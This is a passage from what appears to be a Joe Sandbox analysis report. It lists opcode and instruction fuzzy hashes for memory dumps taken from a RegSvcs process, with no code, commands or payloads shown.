                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0f75bb0275caec53d7f356e5476f36516aca5c2711879d5955fff8c74132605d
                                                                                                              • Instruction ID: 60ac3a45ae126afa241d3b1c8d0625e1feebf95f9ae5aa669de5136e5763717d
                                                                                                              • Opcode Fuzzy Hash: 0f75bb0275caec53d7f356e5476f36516aca5c2711879d5955fff8c74132605d
                                                                                                              • Instruction Fuzzy Hash: 68313076A4012DABCF21DF58DC84BDEBBBAABD8350F1401E5A508A7250DB34DE918F90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                                                                              • Instruction ID: 6f3fd55c8917c349c1a2385c35ad20a8d698fe941e9db171141f9abb16062f03
                                                                                                              • Opcode Fuzzy Hash: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                                                                              • Instruction Fuzzy Hash: C431C972E00215AFDB31DFA9CC81AEEBBF9FF44750F054466E515DB250D6709E008BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                                                                              • Instruction ID: 0ed8d8c656f10431c76010a1adf9c5997cad602f54bd229dc1ef175ba2043574
                                                                                                              • Opcode Fuzzy Hash: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                                                                              • Instruction Fuzzy Hash: 2131C071A40606AFDB22AFADCC50B7EB7BABF84755F404169E906DB352DA70DC01CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                                                                              • Instruction ID: ee5132bc7dd2192b0878f469394649bfb3f947f1842d6634685465aa19dcc5e2
                                                                                                              • Opcode Fuzzy Hash: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                                                                              • Instruction Fuzzy Hash: 59319372B04612DBCB12DE24C89096BBBE9FFD4650F054969FD59AF290DA30DC1187E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                                                                              • Instruction ID: af415e29defa61a62dcfa92e45d46fa67d3a56923cbcc74660278cb8de10581a
                                                                                                              • Opcode Fuzzy Hash: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                                                                              • Instruction Fuzzy Hash: CE3181B26053019FE720CF19C840B1BBBE9FB98700F05496DEA849B791D770E848CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction ID: fabc4e77b77589bbb3955aa63cf91d37c269d50430105476ee2a9e0ae352542f
                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction Fuzzy Hash: CC3128B2B00B05AFD765CFADCE40B57BBF8BB48A50F04092DA59AC7650F730E9008B60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                                                                              • Instruction ID: e3b41fbae8fd990d5df375d05923d88b6e6d30ae35ec41b7eaf314ed9fcf32db
                                                                                                              • Opcode Fuzzy Hash: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                                                                              • Instruction Fuzzy Hash: 7331BA71A453029FC711EF19C94095EBBF1FFC9614F444AAEE498AB311E332D946CBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                                                                              • Instruction ID: e8d985714a8942c922c8246b987f7541a331f7068884c439e204edc4bd9ad084
                                                                                                              • Opcode Fuzzy Hash: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                                                                              • Instruction Fuzzy Hash: 2231C271B00206DFD720DFA8C9C0AAEBBFABB84304F008529D246DB655D734E941CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction ID: 70cfd37bdfcabfa8a573d477fd7fee16a44a9ce7245c822f990a49c7d53baa47
                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction Fuzzy Hash: 9B21F232E4065BAADB14ABB9C840BEFBBF5BF54740F0584369A15FF240E270C90087A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                                                                              • Instruction ID: 019b7044cf6f597bb313b184c5bd822e45d7ad90d58f1c890e16f88be260d47f
                                                                                                              • Opcode Fuzzy Hash: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                                                                              • Instruction Fuzzy Hash: 9A3149B19402519BDB35AF58CC45B6D7BF4FF90304F4481A9D9859F382EA749981CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction ID: de9f490d128f5786fb6e4ebb5d244d9013a767ea527e7b445266f34cc5ea3445
                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction Fuzzy Hash: 8F21D836602653ABCB25AB958D00ABEBBB5EF90610F40841EFB958A791F734D950C760
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                                                                              • Instruction ID: fe3a8bf4a3efd84b5eaffddbec6fc85d6e73d3d38830d6794b31254efbaaedea
                                                                                                              • Opcode Fuzzy Hash: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                                                                              • Instruction Fuzzy Hash: 6631D831A4012D9BDB31EB18CC42FEE77B9FB55740F0105A1E649BF1A0D6749E808FA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction ID: 66ab33c9670edfada6e926aa1718c6cbef5dfb5c4339c27f3bf465f0bfcddaec
                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction Fuzzy Hash: DE217135A00649EFCB15CFA8C990E8EBBB5FF48B14F108069EE159F245D671EA458B90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                                                                              • Instruction ID: 13c57b55f67d29f0a53093da5c1b65e5c44caa1c67666599f7d4cf582b7fa368
                                                                                                              • Opcode Fuzzy Hash: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                                                                              • Instruction Fuzzy Hash: 47219C726047469FCB22CE58C890F6BB7E4FB98B60F01492DF9559F641D730E9008BA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: 87c50d7f6a57eb73072e724c25bf787449f2e21865c87c76f29d221717bd108a
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 8E318931600605EFE721DBA8C885F6AB7F9FF85354F1049A9E556DB290E730EE01CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6cdbd16fa017ee8f227cd4c88be5e4bfcd698fd7beaf6dec66578f26382ced7e
                                                                                                              • Instruction ID: 5a6b835ab163ebab239fd1cc7e3fafa05edea6e321e7cbe34745ceca31b8f2cf
                                                                                                              • Opcode Fuzzy Hash: 6cdbd16fa017ee8f227cd4c88be5e4bfcd698fd7beaf6dec66578f26382ced7e
                                                                                                              • Instruction Fuzzy Hash: 3B31B175A20225DFCB19CF1CDC849AEB7B5FF84304B154959F8059B391EB32E941CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                                                                              • Instruction ID: 2adaf83f405273681ce465e72cee9511e8100c845d1716994c442b882f2901d0
                                                                                                              • Opcode Fuzzy Hash: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                                                                              • Instruction Fuzzy Hash: 10219F7190062AEBCF20DF59CC81ABEB7F8FF48740B544069F941AB254D778AD52CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                                                                              • Instruction ID: d7898c2948ecda0f022a93478653c16009bdb533968798bff0a03873dd6775a2
                                                                                                              • Opcode Fuzzy Hash: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                                                                              • Instruction Fuzzy Hash: B721AB71600606AFDB15DBACCC40E6AB7A8FF98740F184069F904DB790E738ED40CBA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                                                                              • Instruction ID: 7f7490ab3871d4e96a414b02490c872cfa2e7fe13e0f9646b239648c33bd0cec
                                                                                                              • Opcode Fuzzy Hash: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                                                                              • Instruction Fuzzy Hash: 7C21CF729042469BDB11EF59CC44B9BBBDCBF90244F0C8456B980CB265D730C985C6A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                                                                              • Instruction ID: 62c692fd7fe2b5dd38381a9d7c6a7f9424f3619884be9736f88de0f1028cf029
                                                                                                              • Opcode Fuzzy Hash: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                                                                              • Instruction Fuzzy Hash: 34212931644782DBE722576C8C44B6C7BD4BF41774F280368FA25DF6E2D768D8018262
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                                                                              • Instruction ID: a49831a8d1085c2829e30a288e6280697b7746f30d199bb15d81aa747c9c2aa4
                                                                                                              • Opcode Fuzzy Hash: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                                                                              • Instruction Fuzzy Hash: 0721AC75250602AFC72ADF69CC00B56B7F5BF48B08F24846CA509CF761E371E842CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93169c2e54e6c1676c6e94e837fe98ac2feb3aec25cbb2b78cdc0466a03ad5ab
                                                                                                              • Instruction ID: ccc4751d469eb9f3328973d3046cc659313248b91cbd33b2e092bfff0c6c9658
                                                                                                              • Opcode Fuzzy Hash: 93169c2e54e6c1676c6e94e837fe98ac2feb3aec25cbb2b78cdc0466a03ad5ab
                                                                                                              • Instruction Fuzzy Hash: 3E1106723C0B12BFE72656A99C01F2B7699EBD4B60F110468F75ACF690EB60DC0187D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0566c5ce1e0c839de28bed6d781f24d95101fbbab53b8f2d9e2a6d34123f5abb
                                                                                                              • Instruction ID: 8a711b82835785a07e3fa9326d7bd2cd4f2876440fb25744396bf4365aa41021
                                                                                                              • Opcode Fuzzy Hash: 0566c5ce1e0c839de28bed6d781f24d95101fbbab53b8f2d9e2a6d34123f5abb
                                                                                                              • Instruction Fuzzy Hash: B421E9B1E00359ABCB20DFAAD8919AEFBF9FF98610F10022EE505A7354D7709941CB54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction ID: 17cd3c0c25b4add35bb98c69e32fd9838bef8cc3ed440d2fddf62102093729ae
                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                              • Instruction Fuzzy Hash: FA216772A0061AAFDB129F98CC44BAEBBFAFF98315F204859F940A7291D734D9518F50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction ID: a52da0de00a237fec570c8a361c0cfcf9d772a5a4def2b58937aab115106e541
                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                              • Instruction Fuzzy Hash: 62119D76601606EFE7229E99DC41FAABBB8FBD0B64F10442DF6049F190E671ED44CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                                                                              • Instruction ID: 26653dea074a35aa9936b0afbb7312ab3fb00b0440567347c36d02360926026e
                                                                                                              • Opcode Fuzzy Hash: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                                                                              • Instruction Fuzzy Hash: E611C1717006199BDF15CF4DC5C0A6EBBE9BF8B710B1980ADEE089F205D6B2D901C792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                              • Instruction ID: 611ba9e9afeb7b27bd05996c38e9c3f50ce21f5b26e28704dde88c60233a865f
                                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                              • Instruction Fuzzy Hash: A7217972640A49DFD7268F89C540A6AFBF6FB94F14F14887DE54A9B610E730EC01CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                                                                              • Instruction ID: ae4264008e0431efb1f924fe278661b604875b370e048980796cec4da2cabad1
                                                                                                              • Opcode Fuzzy Hash: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                                                                              • Instruction Fuzzy Hash: 8421AE75A0020ADFCB14CFA8C580AAEBBF5FB89318F20416DD105AB310CB71AD06DBD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 785c49ed786e517d2cf8ec11dde2897a27df277b7f437ee395b020f4b2444b08
                                                                                                              • Instruction ID: f80a017e9de4d7c4308ff7ae6d2315ac88f4c1c3f8d84d6e625833a162df3091
                                                                                                              • Opcode Fuzzy Hash: 785c49ed786e517d2cf8ec11dde2897a27df277b7f437ee395b020f4b2444b08
                                                                                                              • Instruction Fuzzy Hash: BB218E75510A01EFD7308FA9C840F66B7E8FF84650F40882DE69ACB751EB30A950CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d2e316ae9d4a45993a61422827938d7770c825e34b1d9b3f3793cea5d9f40c56
                                                                                                              • Instruction ID: 8d66b9970faac24d37c7256b393766a9dd7ff18d69e59d9648246936c7defeda
                                                                                                              • Opcode Fuzzy Hash: d2e316ae9d4a45993a61422827938d7770c825e34b1d9b3f3793cea5d9f40c56
                                                                                                              • Instruction Fuzzy Hash: EA11C132740926EFC722CB69CD40F9AB7A8FF95750F014025FA01DB250DA74E801CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ad9dc9a84a890576bdbc42aabc977f8fc3f9fae4cdba6f36ba6db05e9403e9b4
                                                                                                              • Instruction ID: 47927ba192d16f35245fa5a44b7bda112ea4005cde227cf2a620c6de6065e0e7
                                                                                                              • Opcode Fuzzy Hash: ad9dc9a84a890576bdbc42aabc977f8fc3f9fae4cdba6f36ba6db05e9403e9b4
                                                                                                              • Instruction Fuzzy Hash: E4110C333041159FCB1ADB29CC91ABF7297FFD5374B29452DE522CF291DA309801C290
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf96612c7d02de0bfc37c423ef4503b4d961e97cd44c0e97370d561ed905f209
                                                                                                              • Instruction ID: 56f2e79b9dea4b6c6141773c6629ede5738ce081dd60d4eb9ad9b870a5c9031a
                                                                                                              • Opcode Fuzzy Hash: cf96612c7d02de0bfc37c423ef4503b4d961e97cd44c0e97370d561ed905f209
                                                                                                              • Instruction Fuzzy Hash: 0C119E76A01206EFCB25DF99DA80A5EBBF9BF94A50F45847DD9099F311E630DE00CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction ID: 6ccaec65de8db60055f3342a3422f3f4e981c19623aefff217b71223d1eadc99
                                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                              • Instruction Fuzzy Hash: 9E11B236A10915AFDB19CB98CC05A9DBBB6EF84210F058269EC5597340E671AD51CBD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
